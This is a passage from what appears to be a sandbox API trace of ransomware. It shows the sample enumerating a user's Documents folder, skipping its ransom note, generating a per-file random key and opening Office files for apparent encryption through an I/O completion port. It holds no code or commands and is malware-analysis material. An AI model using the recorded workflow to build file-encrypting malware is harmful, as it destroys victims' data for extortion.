[0166.879] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.879] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.890] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8de91a30, ftCreationTime.dwHighDateTime=0x1d7bdc5, 
ftLastAccessTime.dwLowDateTime=0xce4f9670, ftLastAccessTime.dwHighDateTime=0x1d7c5af, ftLastWriteTime.dwLowDateTime=0xce4f9670, ftLastWriteTime.dwHighDateTime=0x1d7c5af, nFileSizeHigh=0x0, nFileSizeLow=0x81fa, dwReserved0=0x0, dwReserved1=0x60, cFileName="jQGEIUWp.docx", cAlternateFileName="JQGEIU~1.DOC")) returned 1 [0166.890] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\jQGEIUWp.docx") returned 47 [0166.890] lstrcmpW (lpString1="jQGEIUWp.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.890] PathFindExtensionW (pszPath="jQGEIUWp.docx") returned=".docx" [0166.890] lstrlenW (lpString=".docx") returned 5 [0166.890] PathFindExtensionW (pszPath="jQGEIUWp.docx") returned=".docx" [0166.890] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\jQGEIUWp.docx" (normalized: "c:\\users\\5alr3u30d3\\documents\\jqgeiuwp.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.891] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=33274) returned 1 [0166.891] GetProcessHeap () returned 0x270000 [0166.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.892] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="17") returned 2 [0166.892] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="18") returned 2 [0166.892] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="6F") returned 2 [0166.892] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="2B") returned 2 [0166.892] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="95") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" 
| out: param_1="A5") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="5A") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="CB") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="28") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="CB") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="B4") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="F3") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="C6") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="6D") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="94") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="64") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="9F") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="5D") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="9D") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="CA") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="04") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="D3") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="11") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="2C") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="12") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="65") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="28") returned 2 [0166.893] wsprintfW (in: 
param_1=0x4ebddae, param_2="%02X" | out: param_1="02") returned 2 [0166.894] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="0D") returned 2 [0166.894] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="0C") returned 2 [0166.894] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="61") returned 2 [0166.894] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="7D") returned 2 [0166.894] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\jQGEIUWp.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\jQGEIUWp.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\jQGEIUWp.docx" [0166.894] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.895] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.905] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2767860, ftCreationTime.dwHighDateTime=0x1d7b341, ftLastAccessTime.dwLowDateTime=0xadb434c0, ftLastAccessTime.dwHighDateTime=0x1d7d7c0, ftLastWriteTime.dwLowDateTime=0xadb434c0, ftLastWriteTime.dwHighDateTime=0x1d7d7c0, nFileSizeHigh=0x0, nFileSizeLow=0x1ddb, dwReserved0=0x0, dwReserved1=0x60, cFileName="K08Bqm1udfoCJ.pptx", cAlternateFileName="K08BQM~1.PPT")) returned 1 [0166.905] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\K08Bqm1udfoCJ.pptx") returned 52 [0166.905] lstrcmpW (lpString1="K08Bqm1udfoCJ.pptx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.905] PathFindExtensionW (pszPath="K08Bqm1udfoCJ.pptx") returned=".pptx" [0166.905] lstrlenW (lpString=".pptx") returned 5 [0166.905] PathFindExtensionW 
(pszPath="K08Bqm1udfoCJ.pptx") returned=".pptx" [0166.905] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\K08Bqm1udfoCJ.pptx" (normalized: "c:\\users\\5alr3u30d3\\documents\\k08bqm1udfocj.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.906] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=7643) returned 1 [0166.906] GetProcessHeap () returned 0x270000 [0166.906] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.907] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="91") returned 2 [0166.907] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="22") returned 2 [0166.907] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="5E") returned 2 [0166.907] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="8E") returned 2 [0166.907] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="CE") returned 2 [0166.907] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="32") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="95") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="BE") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="C1") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="FF") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="B3") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="D1") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="B7") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd76, 
param_2="%02X" | out: param_1="D2") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="93") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="45") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="3C") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="81") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="5B") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="A8") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="79") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="D3") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="B0") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="42") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="90") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="D5") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="A3") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="A3") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="43") returned 2 [0166.909] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="6C") returned 2 [0166.909] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="8E") returned 2 [0166.909] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="77") returned 2 [0166.909] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\K08Bqm1udfoCJ.pptx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\K08Bqm1udfoCJ.pptx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\K08Bqm1udfoCJ.pptx" [0166.909] 
CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.910] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.924] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c8da280, ftCreationTime.dwHighDateTime=0x1d77e43, ftLastAccessTime.dwLowDateTime=0xd2562db0, ftLastAccessTime.dwHighDateTime=0x1d7d9ff, ftLastWriteTime.dwLowDateTime=0xd2562db0, ftLastWriteTime.dwHighDateTime=0x1d7d9ff, nFileSizeHigh=0x0, nFileSizeLow=0xab0e, dwReserved0=0x0, dwReserved1=0x60, cFileName="KfOTPMS8Hg.xlsx", cAlternateFileName="KFOTPM~1.XLS")) returned 1 [0166.925] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\KfOTPMS8Hg.xlsx") returned 49 [0166.925] lstrcmpW (lpString1="KfOTPMS8Hg.xlsx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.925] PathFindExtensionW (pszPath="KfOTPMS8Hg.xlsx") returned=".xlsx" [0166.925] lstrlenW (lpString=".xlsx") returned 5 [0166.925] PathFindExtensionW (pszPath="KfOTPMS8Hg.xlsx") returned=".xlsx" [0166.925] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\KfOTPMS8Hg.xlsx" (normalized: "c:\\users\\5alr3u30d3\\documents\\kfotpms8hg.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.926] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=43790) returned 1 [0166.926] GetProcessHeap () returned 0x270000 [0166.926] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 
0x74c2008 [0166.927] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="72") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="DD") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="56") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="B2") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="1B") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="1D") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="68") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="69") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="E4") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="9A") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="0A") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="77") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="4E") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="11") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="F9") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="F9") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="F9") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="29") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="78") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="A0") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="CA") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebdd96, 
param_2="%02X" | out: param_1="CF") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="BF") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="5B") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="00") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="CF") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="4B") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="1D") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="18") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="C1") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="A7") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="71") returned 2 [0166.929] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\KfOTPMS8Hg.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\KfOTPMS8Hg.xlsx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\KfOTPMS8Hg.xlsx" [0166.929] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.929] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.948] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fc6cfc0, ftCreationTime.dwHighDateTime=0x1d7d746, ftLastAccessTime.dwLowDateTime=0xaadc1070, ftLastAccessTime.dwHighDateTime=0x1d7e714, ftLastWriteTime.dwLowDateTime=0xaadc1070, ftLastWriteTime.dwHighDateTime=0x1d7e714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="lil9-3r", cAlternateFileName="")) returned 1 [0166.948] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r") returned 41 [0166.948] GetProcessHeap () returned 0x270000 [0166.948] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0166.948] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r" [0166.948] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\*" [0166.948] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fc6cfc0, ftCreationTime.dwHighDateTime=0x1d7d746, ftLastAccessTime.dwLowDateTime=0xaadc1070, ftLastAccessTime.dwHighDateTime=0x1d7e714, ftLastWriteTime.dwLowDateTime=0xaadc1070, ftLastWriteTime.dwHighDateTime=0x1d7e714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x151515, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0166.948] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fc6cfc0, ftCreationTime.dwHighDateTime=0x1d7d746, ftLastAccessTime.dwLowDateTime=0xaadc1070, ftLastAccessTime.dwHighDateTime=0x1d7e714, ftLastWriteTime.dwLowDateTime=0xaadc1070, ftLastWriteTime.dwHighDateTime=0x1d7e714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x151515, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.949] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7541820, ftCreationTime.dwHighDateTime=0x1d7dcd4, ftLastAccessTime.dwLowDateTime=0xd79c8350, ftLastAccessTime.dwHighDateTime=0x1d7e5bc, ftLastWriteTime.dwLowDateTime=0xd79c8350, ftLastWriteTime.dwHighDateTime=0x1d7e5bc, nFileSizeHigh=0x0, nFileSizeLow=0xb442, dwReserved0=0x151515, dwReserved1=0x0, cFileName="8giA-dTTiYC1.doc", cAlternateFileName="8GIA-D~1.DOC")) returned 1 [0166.949] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\8giA-dTTiYC1.doc") returned 58 [0166.949] lstrcmpW (lpString1="8giA-dTTiYC1.doc", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.949] PathFindExtensionW (pszPath="8giA-dTTiYC1.doc") returned=".doc" [0166.949] lstrlenW (lpString=".doc") returned 4 [0166.949] PathFindExtensionW (pszPath="8giA-dTTiYC1.doc") returned=".doc" [0166.949] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\8giA-dTTiYC1.doc" (normalized: "c:\\users\\5alr3u30d3\\documents\\lil9-3r\\8gia-dttiyc1.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.950] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=46146) returned 1 [0166.950] GetProcessHeap () returned 0x270000 [0166.950] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.951] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="6E") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="46") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="1D") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | 
out: param_1="C4") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="63") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="F0") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="45") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="B4") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="18") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="52") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="9A") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="A4") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="F0") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="A2") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="AC") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="98") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="B7") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="E3") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="D3") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="9B") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="08") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="81") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F8") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="A8") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="C0") returned 2 [0166.952] wsprintfW (in: 
param_1=0x4ebda9a, param_2="%02X" | out: param_1="3F") returned 2 [0166.952] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="E7") returned 2 [0166.952] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="A4") returned 2 [0166.952] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="EB") returned 2 [0166.952] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A1") returned 2 [0166.952] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="FD") returned 2 [0166.952] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="08") returned 2 [0166.952] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\8giA-dTTiYC1.doc" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\8giA-dTTiYC1.doc") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\8giA-dTTiYC1.doc" [0166.953] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.953] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.957] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b9f5760, ftCreationTime.dwHighDateTime=0x1d7d920, ftLastAccessTime.dwLowDateTime=0x13d7d4c0, ftLastAccessTime.dwHighDateTime=0x1d7dd46, ftLastWriteTime.dwLowDateTime=0x13d7d4c0, ftLastWriteTime.dwHighDateTime=0x1d7dd46, nFileSizeHigh=0x0, nFileSizeLow=0xc16c, dwReserved0=0x151515, dwReserved1=0x0, cFileName="emzcTg-B_FsWzZV.pptx", cAlternateFileName="EMZCTG~1.PPT")) returned 1 [0166.957] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\emzcTg-B_FsWzZV.pptx") returned 62 [0166.957] lstrcmpW (lpString1="emzcTg-B_FsWzZV.pptx", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.958] PathFindExtensionW (pszPath="emzcTg-B_FsWzZV.pptx") returned=".pptx" [0166.958] lstrlenW (lpString=".pptx") returned 5 [0166.958] PathFindExtensionW (pszPath="emzcTg-B_FsWzZV.pptx") returned=".pptx" [0166.958] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\emzcTg-B_FsWzZV.pptx" (normalized: "c:\\users\\5alr3u30d3\\documents\\lil9-3r\\emzctg-b_fswzzv.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.962] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=49516) returned 1 [0166.962] GetProcessHeap () returned 0x270000 [0166.962] RtlAllocateHeap (HeapHandle=0x270000, 